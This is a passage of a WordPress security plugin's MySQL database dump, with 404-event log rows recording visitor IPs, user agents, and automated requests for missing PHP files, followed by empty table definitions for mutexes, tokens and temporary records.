Edg/83.0.478.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631217969.179195880889892578125;s:12:\"REQUEST_TIME\";i:1631217969;}}','notice','2021-09-09 20:06:11','2021-09-09 20:06:09',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'176.106.246.67'),(96876,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631219979.009212970733642578125;s:12:\"REQUEST_TIME\";i:1631219979;}}','notice','2021-09-09 20:39:41','2021-09-09 20:39:39',72621888,72705624,'http://zphiblgz.org/scholarship/application/',1,0,'80.251.153.12'),(96877,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631221358.6080200672149658203125;s:12:\"REQUEST_TIME\";i:1631221358;}}','notice','2021-09-09 21:02:40','2021-09-09 21:02:38',72611688,72694672,'https://zphiblgz.org/scholarship/application/',1,0,'2.92.127.207'),(96878,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:9:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631222517.0510768890380859375;s:12:\"REQUEST_TIME\";i:1631222517;}}','notice','2021-09-09 21:21:58','2021-09-09 21:21:57',72645352,72729104,'http://zphiblgz.org/wp/',1,0,'162.241.151.154'),(96879,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"35\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631232709.542324066162109375;s:12:\"REQUEST_TIME\";i:1631232709;}}','notice','2021-09-10 00:11:51','2021-09-10 00:11:49',72663840,72764656,'https://zphiblgz.org/wp-includes/css/style.css.php',1,0,'185.191.34.215'),(96880,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631234046.75279903411865234375;s:12:\"REQUEST_TIME\";i:1631234046;}}','notice','2021-09-10 00:34:08','2021-09-10 00:34:06',72603880,72687616,'http://zphiblgz.org/scholarship/application/',1,0,'188.165.241.215'),(96881,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:124:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631235569.13805294036865234375;s:12:\"REQUEST_TIME\";i:1631235569;}}','notice','2021-09-10 00:59:30','2021-09-10 00:59:29',72611200,72694208,'https://zphiblgz.org/application',1,0,'35.210.145.160'),(96882,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:124:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631235573.300283908843994140625;s:12:\"REQUEST_TIME\";i:1631235573;}}','notice','2021-09-10 00:59:35','2021-09-10 00:59:33',72616248,72703512,'https://zphiblgz.org/event/youth-open-house',1,0,'35.210.145.160'),(96883,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631236187.921228885650634765625;s:12:\"REQUEST_TIME\";i:1631236187;}}','notice','2021-09-10 01:09:49','2021-09-10 01:09:48',72185912,72269216,'https://zphiblgz.org/ts_teams/linda-price/',1,0,'207.46.13.174'),(96917,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258333.092433929443359375;s:12:\"REQUEST_TIME\";i:1631258333;}}','notice','2021-09-10 07:18:55','2021-09-10 07:18:53',72612080,72695176,'https://zphiblgz.org/eme.php',1,0,'45.153.160.132'),(96918,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258336.889933109283447265625;s:12:\"REQUEST_TIME\";i:1631258336;}}','notice','2021-09-10 07:18:58','2021-09-10 07:18:57',72612024,72695120,'https://zphiblgz.org/em.php',1,0,'45.153.160.132'),(96919,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258340.543262004852294921875;s:12:\"REQUEST_TIME\";i:1631258340;}}','notice','2021-09-10 07:19:02','2021-09-10 07:19:00',72612080,72695176,'https://zphiblgz.org/pas.php',1,0,'109.70.100.29'),(96920,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258344.0104529857635498046875;s:12:\"REQUEST_TIME\";i:1631258344;}}','notice','2021-09-10 07:19:06','2021-09-10 07:19:04',72612080,72695176,'https://zphiblgz.org/new.php',1,0,'208.68.5.17'),(96921,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258349.0098569393157958984375;s:12:\"REQUEST_TIME\";i:1631258349;}}','notice','2021-09-10 07:19:11','2021-09-10 07:19:09',72612104,72695192,'https://zphiblgz.org/rest.php',1,0,'208.68.5.17'),(96922,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258352.4647529125213623046875;s:12:\"REQUEST_TIME\";i:1631258352;}}','notice','2021-09-10 07:19:14','2021-09-10 07:19:12',72612024,72695120,'https://zphiblgz.org/e.php',1,0,'199.249.230.154'),(96923,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258356.9020340442657470703125;s:12:\"REQUEST_TIME\";i:1631258356;}}','notice','2021-09-10 07:19:18','2021-09-10 07:19:17',72612024,72695120,'https://zphiblgz.org/reset/',1,0,'199.249.230.154'),(96924,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258362.627602100372314453125;s:12:\"REQUEST_TIME\";i:1631258362;}}','notice','2021-09-10 07:19:24','2021-09-10 07:19:22',72612208,72695320,'https://zphiblgz.org/reset/reset.php',1,0,'185.220.101.237'),(96925,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258382.13560199737548828125;s:12:\"REQUEST_TIME\";i:1631258382;}}','notice','2021-09-10 07:19:44','2021-09-10 07:19:42',72612024,72695120,'https://zphiblgz.org/c.php',1,0,'199.249.230.162'),(96926,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258395.87856292724609375;s:12:\"REQUEST_TIME\";i:1631258395;}}','notice','2021-09-10 07:19:57','2021-09-10 07:19:56',72612104,72695224,'https://zphiblgz.org/emergency/',1,0,'185.220.102.243'),(96927,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258400.06713104248046875;s:12:\"REQUEST_TIME\";i:1631258400;}}','notice','2021-09-10 07:20:02','2021-09-10 07:20:00',72611168,72694152,'https://zphiblgz.org/emergency/emergency.php',1,0,'87.118.116.12'),(96928,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258411.5946791172027587890625;s:12:\"REQUEST_TIME\";i:1631258411;}}','notice','2021-09-10 07:20:13','2021-09-10 07:20:11',72610592,72693584,'https://zphiblgz.org/n.php',1,0,'87.118.116.12'),(96929,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258419.4859449863433837890625;s:12:\"REQUEST_TIME\";i:1631258419;}}','notice','2021-09-10 07:20:21','2021-09-10 07:20:19',72610592,72693584,'https://zphiblgz.org/r.php',1,0,'144.172.118.4');
/*!40000 ALTER TABLE `lwz_itsec_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_mutexes`
--

DROP TABLE IF EXISTS `lwz_itsec_mutexes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_mutexes` (
  `mutex_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `mutex_name` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `mutex_expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`mutex_id`),
  UNIQUE KEY `mutex_name` (`mutex_name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_mutexes`
--

LOCK TABLES `lwz_itsec_mutexes` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_mutexes` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_itsec_mutexes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_opaque_tokens`
--

DROP TABLE IF EXISTS `lwz_itsec_opaque_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_opaque_tokens` (
  `token_id` char(64) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `token_hashed` char(64) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `token_type` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `token_data` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `token_created_at` datetime NOT NULL,
  PRIMARY KEY (`token_id`),
  UNIQUE KEY `token_hashed` (`token_hashed`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_opaque_tokens`
--

LOCK TABLES `lwz_itsec_opaque_tokens` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_opaque_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_itsec_opaque_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_temp`
--

DROP TABLE IF EXISTS `lwz_itsec_temp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_temp` (
  `temp_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `temp_type` varchar(25) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `temp_date` datetime NOT NULL,
  `temp_date_gmt` datetime NOT NULL,
  `temp_host` varchar(40) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `temp_user` bigint(20) unsigned DEFAULT NULL,
  `temp_username` varchar(60) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`temp_id`),
  KEY `temp_date_gmt` (`temp_date_gmt`),
  KEY `temp_host` (`temp_host`),
  KEY `temp_user` (`temp_user`),
  KEY `temp_username` (`temp_username`)
) ENGINE=MyISAM AUTO_INCREMENT=84677 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_temp`
--

LOCK TABLES `lwz_itsec_temp` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_temp` DISABLE KEYS */;
INSERT INTO `lwz_itsec_temp` VALUES (66236,'four_oh_four','2020-04-01 04:57:53','2020-04-01 09:57:53','185.220.101.152',NULL,NULL),(66235,'four_oh_four','2020-04-01 04:57:46','2020-04-01 09:57:46','185.220.101.152',NULL,NULL),(66234,'four_oh_four','2020-04-01 04:57:40','2020-04-01 09:57:40','185.220.101.152',NULL,NULL),(66233,'four_oh_four','2020-04-01 04:57:33','2020-04-01 09:57:33','185.220.101.152',NULL,NULL),(66232,'four_oh_four','2020-04-01 04:57:26','2020-04-01 09:57:26','185.220.101.152',NULL,NULL),(66231,'four_oh_four','2020-04-01 04:47:18','2020-04-01 09:47:18','193.106.30.99',NULL,NULL),(66230,'four_oh_four','2020-04-01 04:33:03','2020-04-01 09:33:03','40.77.167.168',NULL,NULL),(66229,'four_oh_four','2020-04-01 03:32:35','2020-04-01 08:32:35','193.106.30.99',NULL,NULL),(66228,'four_oh_four','2020-04-01 01:37:19','2020-04-01 06:37:19','193.106.30.99',NULL,NULL),(66227,'four_oh_four','2020-04-01 00:09:52','2020-04-01 05:09:52','193.106.30.99',NULL,NULL),(66226,'four_oh_four','2020-03-31 23:46:16','2020-04-01 04:46:16','193.106.30.99',NULL,NULL),(66225,'four_oh_four','2020-03-31 23:11:39','2020-04-01 04:11:39','193.106.30.99',NULL,NULL),(66224,'four_oh_four','2020-03-31 22:22:51','2020-04-01 03:22:51','193.106.30.99',NULL,NULL),(66223,'four_oh_four','2020-03-31 21:52:55','2020-04-01 02:52:55','193.106.30.99',NULL,NULL),(66222,'four_oh_four','2020-03-31 